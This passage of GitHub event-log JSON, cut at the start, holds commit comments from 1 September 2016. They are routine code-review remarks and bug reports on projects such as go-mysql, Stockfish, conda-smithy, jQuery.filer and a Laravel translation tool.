the exception message will say, that there are overloaded variants of the methods, which allow the application to specify the types explicitly, in situations where it fails.\r\n\r\nSo it's currently not perfect, but hopefully - maybe - with Java 9, this situation will improve!"}},"created_at":"2016-09-01T08:20:36Z"}
{"id":"4501144971","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18859824,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T08:22:21Z","updated_at":"2016-09-01T08:22:21Z","body":"btw the logs you pasted seem to indicate that everything went right, this is why i want the full log from the first transcode after starting: to ensure that indeed everything is right"}},"created_at":"2016-09-01T08:22:21Z"}
{"id":"4501147375","type":"CommitCommentEvent","actor":{"login":"pelson"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18859827,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T08:22:56Z","updated_at":"2016-09-01T08:22:56Z","body":"These are the default values, but should be possible to override in the `conda-forge.yaml`."}},"created_at":"2016-09-01T08:22:56Z"}
{"id":"4501151307","type":"CommitCommentEvent","actor":{"login":"Spring-Listening"},"repo":{"name":"Spring-Listening/test"},"payload":{"comment":{"id":18859839,"position":null,"line":null,"path":null,"commit_id":"593829c818338bbe8e749f8a2b69035240e21c43","created_at":"2016-09-01T08:23:54Z","updated_at":"2016-09-01T08:23:54Z","body":"今天天气很好"}},"created_at":"2016-09-01T08:23:54Z"}
{"id":"4501155094","type":"CommitCommentEvent","actor":{"login":"lettierimarco"},"repo":{"name":"amzn/alexa-skills-kit-java"},"payload":{"comment":{"id":18859849,"position":null,"line":null,"path":null,"commit_id":"7411ac4246115f5d3db03d9477a6818ad57aa977","created_at":"2016-09-01T08:24:44Z","updated_at":"2016-09-01T08:24:44Z","body":"Why signature.verify returns always false to me? even if tested from service simulator?\r\nAny ideas?"}},"created_at":"2016-09-01T08:24:44Z"}
{"id":"4501163892","type":"CommitCommentEvent","actor":{"login":"siddharthsingh91"},"repo":{"name":"CreativeDream/jQuery.filer"},"payload":{"comment":{"id":18859870,"position":null,"line":null,"path":null,"commit_id":"c50df8f2a633a0eb8452fc3ea8c0d533b483aa71","created_at":"2016-09-01T08:26:36Z","updated_at":"2016-09-01T08:26:36Z","body":"@vshekharjha Thanks for your reply.\r\n\r\ncan you please tell me where i have to stop the AJAX funtion and call it on click\t\r\n\r\n$(\"#filer_input2\").filer({\r\n\t\tlimit: 5,\r\n\t\tmaxSize: 5,\r\n\t\textensions: [\"jpg\", \"png\", \"pdf\", \"JPG\", \"html\"],\r\n\t\tchangeInput: '<div class=\"jFiler-input-dragDrop\"><div class=\"jFiler-input-inner\"><div class=\"jFiler-input-icon\"><i class=\"icon-jfi-cloud-up-o\"></i></div><div class=\"jFiler-input-text\"><h3>Drag&Drop files here</h3> <span style=\"display:inline-block; margin: 15px 0\">or</span></div><a class=\"jFiler-input-choose-btn blue\">Browse Files</a></div></div>',\r\n\t\tshowThumbs: true,\r\n\t\ttheme: \"dragdropbox\",\r\n\t\ttemplates: {\r\n\t\t\tbox: '<ul class=\"jFiler-items-list jFiler-items-grid\"></ul>',\r\n\t\t\titem: '<li class=\"jFiler-item\">\\\r\n\t\t\t\t\t\t<div class=\"jFiler-item-container\">\\\r\n\t\t\t\t\t\t\t<div class=\"jFiler-item-inner\">\\\r\n\t\t\t\t\t\t\t\t<div class=\"jFiler-item-thumb\">\\\r\n\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-status\"></div>\\\r\n\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-thumb-overlay\">\\\r\n\t\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-info\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t<div style=\"display:table-cell;vertical-align: middle;\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"jFiler-item-title\"><b title=\"{{fi-name}}\">{{fi-name}}</b></span>\\\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"jFiler-item-others\">{{fi-size2}}</span>\\\r\n\t\t\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t{{fi-image}}\\\r\n\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t<div class=\"jFiler-item-assets jFiler-row\">\\\r\n\t\t\t\t\t\t\t\t\t<ul class=\"list-inline pull-left\">\\\r\n\t\t\t\t\t\t\t\t\t\t<li>{{fi-progressBar}}</li>\\\r\n\t\t\t\t\t\t\t\t\t</ul>\\\r\n\t\t\t\t\t\t\t\t\t<ul class=\"list-inline pull-right\">\\\r\n\t\t\t\t\t\t\t\t\t\t<li><a class=\"icon-jfi-trash jFiler-item-trash-action\"></a></li>\\\r\n\t\t\t\t\t\t\t\t\t</ul>\\\r\n\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t</li>',\r\n\t\t\titemAppend: '<li class=\"jFiler-item\">\\\r\n\t\t\t\t\t\t\t<div class=\"jFiler-item-container\">\\\r\n\t\t\t\t\t\t\t\t<div class=\"jFiler-item-inner\">\\\r\n\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-thumb\">\\\r\n\t\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-status\"></div>\\\r\n\t\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-thumb-overlay\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-info\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t\t<div style=\"display:table-cell;vertical-align: middle;\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"jFiler-item-title\"><b title=\"{{fi-name}}\">{{fi-name}}</b></span>\\\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"jFiler-item-others\">{{fi-size2}}</span>\\\r\n\t\t\t\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t\t{{fi-image}}\\\r\n\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t\t<div class=\"jFiler-item-assets jFiler-row\">\\\r\n\t\t\t\t\t\t\t\t\t\t<ul class=\"list-inline pull-left\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t<li><span class=\"jFiler-item-others\">{{fi-icon}}</span></li>\\\r\n\t\t\t\t\t\t\t\t\t\t</ul>\\\r\n\t\t\t\t\t\t\t\t\t\t<ul class=\"list-inline pull-right\">\\\r\n\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"icon-jfi-trash jFiler-item-trash-action\"></a></li>\\\r\n\t\t\t\t\t\t\t\t\t\t</ul>\\\r\n\t\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t\t</div>\\\r\n\t\t\t\t\t\t</li>',\r\n\t\t\tprogressBar: '<div class=\"bar\"></div>',\r\n\t\t\titemAppendToEnd: false,\r\n\t\t\tcanvasImage: true,\r\n\t\t\tremoveConfirmation: true,\r\n\t\t\t_selectors: {\r\n\t\t\t\tlist: '.jFiler-items-list',\r\n\t\t\t\titem: '.jFiler-item',\r\n\t\t\t\tprogressBar: '.bar',\r\n\t\t\t\tremove: '.jFiler-item-trash-action'\r\n\t\t\t}\r\n\t\t},\r\n\t\tdragDrop: {\r\n\t\t\tdragEnter: null,\r\n\t\t\tdragLeave: null,\r\n\t\t\tdrop: null,\r\n\t\t},\r\n\t\tuploadFile: {\r\n\t\t\turl: \"ASEngine/ASAjax.php\",\r\n\t\t\tdata: {action : 'submitUpload', contact_id:contact_name},\r\n\t\t\ttype: 'POST',\r\n\t\t\tenctype: 'multipart/form-data',\r\n\t\t\tprocessData: false,\r\n\t\t\t contentType: false,\r\n\t\t\tbeforeSend: function(){\r\n\t\t\t\t},\r\n\t\t\tsuccess: function(data, itemEl, listEl, boxEl, newInputEl, inputEl, id){\r\n\t\t\t\tvar parent = itemEl.find(\".jFiler-jProgressBar\").parent(),\r\n\t\t\t\tfindData = JSON.parse(data),\r\n\t\t\t\t\tnew_file_name = findData.name;\r\n\t\t\t\t\tfilerKit = inputEl.prop(\"jFiler\");\r\n\t\t\t\t\tfilerKit.files_list[id].lastInsertId = findData.lastInsertId\r\n             \t\tfilerKit.files_list[id].name = new_file_name;\r\n\t  \t\t\titemEl.find(\".jFiler-jProgressBar\").fadeOut(\"slow\", function(){\r\n\t\t\t\t\t$(\"<div class=\\\"jFiler-item-others text-success\\\"><i class=\\\"icon-jfi-check-circle\\\"></i> Success</div>\").hide().appendTo(parent).fadeIn(\"slow\");\r\n\t\t\t\t});\r\n\t\t\t},\r\n\t\t\terror: function(el){\r\n\t\t\t\tvar parent = el.find(\".jFiler-jProgressBar\").parent();\r\n\t\t\t\tel.find(\".jFiler-jProgressBar\").fadeOut(\"slow\", function(){\r\n\t\t\t\t\t$(\"<div class=\\\"jFiler-item-others text-error\\\"><i class=\\\"icon-jfi-minus-circle\\\"></i> Error</div>\").hide().appendTo(parent).fadeIn(\"slow\");\r\n\t\t\t\t});\r\n\t\t\t},\r\n\t\t\tstatusCode: null,\r\n\t\t\tonProgress: null,\r\n\t\t\tonComplete: null\r\n\t\t},\r\n\t\tfiles: null,\r\n\t\taddMore: false,\r\n\t\tclipBoardPaste: true,\r\n\t\texcludeName: null,\r\n\t\tbeforeRender: null,\r\n\t\tafterRender: null,\r\n\t\tbeforeShow: null,\r\n\t\tbeforeSelect: null,\r\n\t\tonSelect: null,\r\n\t\tafterShow: null,\r\n\t\tonRemove: function(itemEl, file, id, listEl, boxEl, newInputEl, inputEl){\r\n\t\t\tvar filerKit = inputEl.prop(\"jFiler\"),\r\n\t\t        file_name = filerKit.files_list[id].name;\r\n\t\t\t\tlastInsertIdRes=filerKit.files_list[id].lastInsertId;\r\n\r\n\t\t    $.post('ASEngine/ASAjax.php', {file:file_name, action:'submitUploadDelete', contact_id:contact_name,lastInsertId:lastInsertIdRes});\r\n\t\t},\r\n\t\tonEmpty: null,\r\n\t\toptions: null,\r\n\t\tdialogs: {\r\n\t\t\talert: function(text) {\r\n\t\t\t\treturn alert(text);\r\n\t\t\t},\r\n\t\t\tconfirm: function (text, callback) {\r\n\t\t\t\tconfirm(text) ? callback() : null;\r\n\t\t\t}\r\n\t\t},\r\n\t\tcaptions: {\r\n\t\t\tbutton: \"Choose Files\",\r\n\t\t\tfeedback: \"Choose files To Upload\",\r\n\t\t\tfeedback2: \"files were chosen\",\r\n\t\t\tdrop: \"Drop file here to Upload\",\r\n\t\t\tremoveConfirmation: \"Are you sure you want to remove this file?\",\r\n\t\t\terrors: {\r\n\t\t\t\tfilesLimit: \"Only {{fi-limit}} files are allowed to be uploaded.\",\r\n\t\t\t\tfilesType: \"Only Images are allowed to be uploaded.\",\r\n\t\t\t\tfilesSize: \"{{fi-name}} is too large! Please upload file up to {{fi-maxSize}} MB.\",\r\n\t\t\t\tfilesSizeAll: \"Files you've choosed are too large! Please upload files up to {{fi-maxSize}} MB.\"\r\n\t\t\t}\r\n\t\t}\r\n\t});\r\n})\r\n\r\n\r\n $(\"#submit-button\").click(\r\n        function(e) {\r\n $.ajax({\r\n        url: \"ASEngine/ASAjax.php\"\r\n        , data: ajaxData\r\n        , type: \"POST\"\r\n        , enctype: 'multipart/form-data'\r\n        , processData: false\r\n        , contentType: false\r\n        , success: function(result) {\r\n\r\nconsole.log(\"sccess\");\r\n\r\n        }\r\n        , error: function(xhr, status, error) {\r\n            console.log(xhr + \"\" + status + \"\" + error);\r\n        }\r\n    });"}},"created_at":"2016-09-01T08:26:36Z"}
{"id":"4501167658","type":"CommitCommentEvent","actor":{"login":"ShuaiZh"},"repo":{"name":"ShuaiZh/zhangshuai"},"payload":{"comment":{"id":18859873,"position":null,"line":null,"path":null,"commit_id":"278db07a8a68d5e023bc42571f055ec4a0068e09","created_at":"2016-09-01T08:27:26Z","updated_at":"2016-09-01T08:27:26Z","body":"ghffhjf"}},"created_at":"2016-09-01T08:27:26Z"}
{"id":"4501168264","type":"CommitCommentEvent","actor":{"login":"ShuaiZh"},"repo":{"name":"ShuaiZh/zhangshuai"},"payload":{"comment":{"id":18859876,"position":null,"line":null,"path":null,"commit_id":"278db07a8a68d5e023bc42571f055ec4a0068e09","created_at":"2016-09-01T08:27:34Z","updated_at":"2016-09-01T08:27:34Z","body":"chgj"}},"created_at":"2016-09-01T08:27:34Z"}
{"id":"4501170658","type":"CommitCommentEvent","actor":{"login":"snaury"},"repo":{"name":"siddontang/go-mysql"},"payload":{"comment":{"id":18859879,"position":11,"line":266,"path":"replication/row_event.go","commit_id":"5a3273638b17cebd30530fa09e3bc923075245f4","created_at":"2016-09-01T08:28:02Z","updated_at":"2016-09-01T08:28:02Z","body":"No, it should be just `for pos < len(data) {`, neither `+1` nor `-1`. Panics in the past were probably due to something else."}},"created_at":"2016-09-01T08:28:02Z"}
{"id":"4501174415","type":"CommitCommentEvent","actor":{"login":"astumpf"},"repo":{"name":"ROBOTIS-GIT/ROBOTIS-THORMANG-MPC"},"payload":{"comment":{"id":18859881,"position":null,"line":null,"path":null,"commit_id":"35809623a8b78a2395f1f348e74ff4951ce46391","created_at":"2016-09-01T08:28:49Z","updated_at":"2016-09-01T08:28:49Z","body":"Please take note of #17. Applying this patch resolves any worries about cpu usage while avoiding to delay any ros messages unnecessarily."}},"created_at":"2016-09-01T08:28:49Z"}
{"id":"4501176194","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18859885,"position":9,"line":1125,"path":"app/ledger.js","commit_id":"980e6645bedb098b020cd813503f257d80b00f58","created_at":"2016-09-01T08:29:14Z","updated_at":"2016-09-01T08:29:14Z","body":"Understood and thanks for the heads-up!\n\n/mtr\n\n\n\n\nOn Wed, Aug 31, 2016 at 6:43 PM -0700, \"yan zhu (@bcrypt)\" <notifications@github.com> wrote:\n\n\n\n\n\n\n\n\n\n\n\n\n@mrose17 heads up on this change. i don't think tests can know where the the userData directory is, so test state files are in ~/.brave-test-ledger\n\n\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n\n\n\n\n\n"}},"created_at":"2016-09-01T08:29:14Z"}
{"id":"4501185507","type":"CommitCommentEvent","actor":{"login":"rik-cross"},"repo":{"name":"mushiva2000/scratch-curriculum"},"payload":{"comment":{"id":18859894,"position":null,"line":null,"path":null,"commit_id":"f6afddc78c10fd9ec5a6127bd7297c2d9a3e40b4","created_at":"2016-09-01T08:31:19Z","updated_at":"2016-09-01T08:31:19Z","body":"Great, thank you."}},"created_at":"2016-09-01T08:31:19Z"}
{"id":"4501190554","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/optimizer-api"},"payload":{"comment":{"id":18859906,"position":26,"line":31,"path":"public/js/script.js","commit_id":"83834657e9bddfcce212df46ea5900914904fc1c","created_at":"2016-09-01T08:32:26Z","updated_at":"2016-09-01T08:32:26Z","body":"indent"}},"created_at":"2016-09-01T08:32:26Z"}
{"id":"4501199416","type":"CommitCommentEvent","actor":{"login":"cahirwpz"},"repo":{"name":"cahirwpz/mimiker"},"payload":{"comment":{"id":18859949,"position":null,"line":null,"path":null,"commit_id":"d99e1cf77a62edce976f73ed7e90f2228eb69d62","created_at":"2016-09-01T08:34:27Z","updated_at":"2016-09-01T08:34:27Z","body":"Note, that both function should work atomically:\r\n\r\n> [...] atomic operations commonly have a succeed-or-fail definition—they either successfully change the state of the system, or have no apparent effect.\r\n> https://en.wikipedia.org/wiki/Linearizability\r\n\r\n`pmap_unmap` **must fail** if it tries to unmap a page that is not already mapped. Similarly `pmap_protect` **must fail** if it tries to change protection bits of a page that is not mapped. In fact `pmap_map` should be modified as well to match desired behavior.\r\n\r\nAs I mentioned a few times, it's crucial for code inspection and analysis that functions always transition from  one well defined state to another well defined state. Keep it in mind!"}},"created_at":"2016-09-01T08:34:27Z"}
{"id":"4501199965","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18859954,"position":16,"line":192,"path":"src/types.h","commit_id":"335f297b6ca1882469cc1f01abcbeec7d5eea61a","created_at":"2016-09-01T08:34:34Z","updated_at":"2016-09-01T08:34:34Z","body":"How did you decide on the changes for MidgameLimit and EndgameLimit? I don't understand how these values have been chosen at all even in master code, in fact..."}},"created_at":"2016-09-01T08:34:34Z"}
{"id":"4501200152","type":"CommitCommentEvent","actor":{"login":"VZhyrytskiy"},"repo":{"name":"sane88/angularjs-04-services"},"payload":{"comment":{"id":18859956,"position":null,"line":null,"path":null,"commit_id":"ac47cfee308019351ffdb512a9aeef974edbfc99","created_at":"2016-09-01T08:34:36Z","updated_at":"2016-09-01T08:34:36Z","body":"It is interesting solution, but I think that we have too many nested if statement. Another solution may be to use range and repeat operator."}},"created_at":"2016-09-01T08:34:36Z"}
{"id":"4501202559","type":"CommitCommentEvent","actor":{"login":"euangoddard"},"repo":{"name":"2degrees/twapi-users"},"payload":{"comment":{"id":18859963,"position":23,"line":104,"path":"twapi_users/__init__.py","commit_id":"1114c3c9df098beafbf9d688ffe9700aabf1df2f","created_at":"2016-09-01T08:35:07Z","updated_at":"2016-09-01T08:35:07Z","body":"If we don't expect a body here, could we actually make a HEAD request?"}},"created_at":"2016-09-01T08:35:07Z"}
{"id":"4501204608","type":"CommitCommentEvent","actor":{"login":"kkaefer"},"repo":{"name":"kkaefer/utf7"},"payload":{"comment":{"id":18859969,"position":23,"line":29,"path":"utf7.js","commit_id":"fc5bf2f9dc6e7d6977e2f775954e0035e87988d6","created_at":"2016-09-01T08:35:33Z","updated_at":"2016-09-01T08:35:33Z","body":"Um, you're totally right. Not sure what made me commit this..."}},"created_at":"2016-09-01T08:35:33Z"}
{"id":"4501207002","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"siddontang/go-mysql"},"payload":{"comment":{"id":18859976,"position":11,"line":266,"path":"replication/row_event.go","commit_id":"5a3273638b17cebd30530fa09e3bc923075245f4","created_at":"2016-09-01T08:36:03Z","updated_at":"2016-09-01T08:36:03Z","body":"Hi @snaury \r\nOrigin we use `for pos < len(data)`, but some users meet panic here, and we don't know why. \r\nBtw, you can see a python replication here https://github.com/noplay/python-mysql-replication/blob/master/pymysqlreplication/row_event.py#L391, it also uses `-1`. \r\n\r\nIf we don't find a case to re-produce this error, I prefer using `-1` here, it runs well in many users' productions, but if no `-1`, panics occurs randomly......."}},"created_at":"2016-09-01T08:36:03Z"}
{"id":"4501213631","type":"CommitCommentEvent","actor":{"login":"euangoddard"},"repo":{"name":"2degrees/twapi-users"},"payload":{"comment":{"id":18859996,"position":13,"line":161,"path":"twapi_users/testing.py","commit_id":"1114c3c9df098beafbf9d688ffe9700aabf1df2f","created_at":"2016-09-01T08:37:30Z","updated_at":"2016-09-01T08:37:30Z","body":"Should this be an ABC?"}},"created_at":"2016-09-01T08:37:30Z"}
{"id":"4501215401","type":"CommitCommentEvent","actor":{"login":"Spring-Listening"},"repo":{"name":"Spring-Listening/test"},"payload":{"comment":{"id":18860000,"position":null,"line":null,"path":null,"commit_id":"593829c818338bbe8e749f8a2b69035240e21c43","created_at":"2016-09-01T08:37:54Z","updated_at":"2016-09-01T08:37:54Z","body":"今天天气很好"}},"created_at":"2016-09-01T08:37:54Z"}
{"id":"4501215708","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18860001,"position":13,"line":101,"path":"src/material.cpp","commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T08:37:58Z","updated_at":"2016-09-01T08:37:58Z","body":"Please don't leave the \"1667\" alone in the middle of the code, but use a constant with an documentating name instead (\"bishopPairValue or whatever seems more appropriate)"}},"created_at":"2016-09-01T08:37:58Z"}
{"id":"4501220607","type":"CommitCommentEvent","actor":{"login":"hotta"},"repo":{"name":"laravel-ja/comja5"},"payload":{"comment":{"id":18860012,"position":5,"line":98,"path":"Comja/Processors/Converter.php","commit_id":"fc97f058d027bcc6b76edd185e1df9de2dd1acf4","created_at":"2016-09-01T08:39:03Z","updated_at":"2016-09-01T08:39:03Z","body":"『Laravelリファレンス Ver.5.1 LTS 対応』で、Laravel の学習を始めた者です。\r\n昨日までは動いていた comja5 （実行は一瞬で終了します）が、9/1 から動かなくなりました。\r\n\r\n症状としては、（strace で追った限りでは）何かのファイルを / から延々と探しに行って、数分後にメモリを食い尽くしてエラー（allowed memory size exhausted）を吐くというものです。SegV になったこともあります。\r\n\r\nlaravel 自体は書籍の記載とズレないように、5.1 を入れています。\r\n\r\n```laravel/task/main.yml\r\n- name: Install laravel 5.1 LTS\r\n  composer:\r\n    command: create-project\r\n    arguments: \"laravel/laravel:5.1\"\r\n    working_dir: \"{{ LARAVEL_BASE }}\"\r\n  when: laravel.stat.exists == false\r\n```\r\n\r\n今回の commit の Comja/Processors/Converter.php:98 を抜くと正常終了するところまではわかりました。が、なにもかも素人のため、どう直せばよいのかはわかりません。ちなみに /routes は laravel-5.1 にはなく、laravel-5.3 にはあるようです。\r\n\r\n以上、ご報告まで。（ちなみに Github でコメントするのも初めてです。不手際がありましたらご容赦ください。）"}},"created_at":"2016-09-01T08:39:03Z"}
{"id":"4501223756","type":"CommitCommentEvent","actor":{"login":"ddprrt"},"repo":{"name":"Dynatrace/css-groundhog"},"payload":{"comment":{"id":18860023,"position":null,"line":null,"path":null,"commit_id":"f6006c7fbddcbafa338b4b5a745a101872069942","created_at":"2016-09-01T08:39:44Z","updated_at":"2016-09-01T08:39:44Z","body":"Bootstrap does it differently? Meh... people can never decide :D"}},"created_at":"2016-09-01T08:39:44Z"}
{"id":"4501226436","type":"CommitCommentEvent","actor":{"login":"siddharthsingh91"},"repo":{"name":"CreativeDream/jQuery.filer"},"payload":{"comment":{"id":18860032,"position":null,"line":null,"path":null,"commit_id":"c50df8f2a633a0eb8452fc3ea8c0d533b483aa71","created_at":"2016-09-01T08:40:18Z","updated_at":"2016-09-01T08:40:18Z","body":"where i have to call validFile function\r\n\r\n$(\"#filer_input2\").filer({\r\nlimit: 3,\r\nmaxSize: 3,\r\naddMore: true,\r\nextensions: [\"jpg\", \"png\", \"gif\"],\r\nshowThumbs: true\r\n});"}},"created_at":"2016-09-01T08:40:18Z"}
{"id":"4501227082","type":"CommitCommentEvent","actor":{"login":"franciscoruiz"},"repo":{"name":"2degrees/twapi-users"},"payload":{"comment":{"id":18860036,"position":23,"line":104,"path":"twapi_users/__init__.py","commit_id":"1114c3c9df098beafbf9d688ffe9700aabf1df2f","created_at":"2016-09-01T08:40:26Z","updated_at":"2016-09-01T08:40:26Z","body":"Definitely! I'll change it."}},"created_at":"2016-09-01T08:40:26Z"}
{"id":"4501230819","type":"CommitCommentEvent","actor":{"login":"Blood-Asp"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18860051,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T08:41:14Z","updated_at":"2016-09-01T08:41:14Z","body":"My first test showed an improvement of 11sec. 1:57 --> 1:46. I tested in the small kirara modpack(61mods) and with an fast PC. \r\nGreg himself said something about a 5min improvement, but no idea how long the total time was.\r\nAnd best compare the versions directly before and after that commit. Other changes might change the result.\r\nhttp://1drv.ms/1L4h4gC There you can find my builds of that (.23pre2 -> pre3)"}},"created_at":"2016-09-01T08:41:14Z"}
{"id":"4501231617","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18860054,"position":null,"line":null,"path":null,"commit_id":"3635568d58810bcd9ed0f4b6ad896be652f4c71b","created_at":"2016-09-01T08:41:23Z","updated_at":"2016-09-01T08:41:23Z","body":"Something about it isn't stable.\r\nServer wasn't connectable confirmed by me and two other mates.\r\nI was connected to the server via remote desktop at the time and the scan was still running so absolutely no other connectivity issues.\r\nRelaunching pokesite.py resolved."}},"created_at":"2016-09-01T08:41:23Z"}
{"id":"4501232582","type":"CommitCommentEvent","actor":{"login":"jalada"},"repo":{"name":"fjg/letsencrypt-rails-heroku"},"payload":{"comment":{"id":18860057,"position":null,"line":null,"path":null,"commit_id":"a4e36dbc407e394ab10b51f17ab83de4a65cf0ae","created_at":"2016-09-01T08:41:36Z","updated_at":"2016-09-01T08:41:36Z","body":"This is a handy change @fjg! I've reflected it in an open issue upstream https://github.com/pixielabs/letsencrypt-rails-heroku/issues/6"}},"created_at":"2016-09-01T08:41:36Z"}
{"id":"4501235222","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18860063,"position":null,"line":null,"path":null,"commit_id":"accdb96d922d789bf8204ff4ca1af87d09673c90","created_at":"2016-09-01T08:42:12Z","updated_at":"2016-09-01T08:42:12Z","body":"This commit only makes sense like this if https://github.com/crosswalk-project/chromium-crosswalk/commit/ad2a7f0f00c95fad6fa8c2f8484fd63fb7572fc4 is also present, otherwise you're pointing at the wrong location for `CardboardVRDevice.java`.\r\n\r\nI only moved that file to another path because of gyp (which did not explicitly list all files and was always finding `CardboardVRDevice.java` with `find . -name *.java`), and, in any case, M53 already seems to contain https://codereview.chromium.org/2029703002 so this entire patch has no effect in its current form.\r\n\r\nI will submit another pull request with what needs to be done and a new explanation in the commit message.\r\n"}},"created_at":"2016-09-01T08:42:12Z"}
{"id":"4501235290","type":"CommitCommentEvent","actor":{"login":"Sevreus"},"repo":{"name":"Sevreus/hello-world"},"payload":{"comment":{"id":18860064,"position":null,"line":null,"path":null,"commit_id":"fe9b6f75a5c1c501d044fe777a8a2200215bc44d","created_at":"2016-09-01T08:42:13Z","updated_at":"2016-09-01T08:42:13Z","body":"Ready for review."}},"created_at":"2016-09-01T08:42:13Z"}
{"id":"4501236087","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18860065,"position":69,"line":121,"path":"pom.xml","commit_id":"cdfb7e6224d2c4004c5e3c3b68a2cfa917e7c0e1","created_at":"2016-09-01T08:42:23Z","updated_at":"2016-09-01T08:42:23Z","body":"Why did you move checkstyle.xml into the persistence module?\r\nIt is used by all modules. Shouldn't it remain where it was? :)"}},"created_at":"2016-09-01T08:42:23Z"}
{"id":"4501236770","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18860070,"position":null,"line":null,"path":null,"commit_id":"c91560e87c7d843b3f2cdc7c8e1427ac0f724d90","created_at":"2016-09-01T08:42:32Z","updated_at":"2016-09-01T08:42:32Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eCAXtm9tQDGYv5NNjjsGBA"}},"created_at":"2016-09-01T08:42:32Z"}
{"id":"4501236883","type":"CommitCommentEvent","actor":{"login":"nightwolfdu"},"repo":{"name":"nightwolfdu/victory-chart"},"payload":{"comment":{"id":18860072,"position":41,"line":41,"path":"src/helpers/axissync.js","commit_id":"d43bb14fd8e2be06ef6fd8f3e5d47172c4f50588","created_at":"2016-09-01T08:42:33Z","updated_at":"2016-09-01T08:42:33Z","body":"Make better."}},"created_at":"2016-09-01T08:42:33Z"}
{"id":"4501241780","type":"CommitCommentEvent","actor":{"login":"snaury"},"repo":{"name":"siddontang/go-mysql"},"payload":{"comment":{"id":18860085,"position":11,"line":266,"path":"replication/row_event.go","commit_id":"5a3273638b17cebd30530fa09e3bc923075245f4","created_at":"2016-09-01T08:43:35Z","updated_at":"2016-09-01T08:43:35Z","body":"Sorry, but Python version is far from ideal, I don't understand why anyone would consider it as a source of truth (it isn't). In C++ sources for mysql itself there's no `-1` or `+1` (actually there is, but that's probably what created the confusion, since it only compensates for a byte added elsewhere). Unfortunately #33 does not have a full backtrace, so it's unclear where `index out of range` actually happened."}},"created_at":"2016-09-01T08:43:35Z"}
{"id":"4501242576","type":"CommitCommentEvent","actor":{"login":"MrZaYaC"},"repo":{"name":"kostyakudo/Hillel-FE-Basic"},"payload":{"comment":{"id":18860086,"position":34,"line":27,"path":"index.html","commit_id":"fc7cddcea70fe091247996647aba1bf0b160f99b","created_at":"2016-09-01T08:43:45Z","updated_at":"2016-09-01T08:43:45Z","body":"`</div>` закрой за тегом </ul> а то так не валидно"}},"created_at":"2016-09-01T08:43:45Z"}
{"id":"4501245036","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18860094,"position":null,"line":null,"path":null,"commit_id":"ead968e0a9a2b8ca8275eb65860f2359b90cdc51","created_at":"2016-09-01T08:44:17Z","updated_at":"2016-09-01T08:44:17Z","body":"That's exactly the kind of complexity in kernel I wanted to avoid. I have a different plan involving writing the sysinfo header to include the strings and getting the size right by writing a .h file of the struct at the same time as generating the version code.\r\n\r\n"}},"created_at":"2016-09-01T08:44:17Z"}
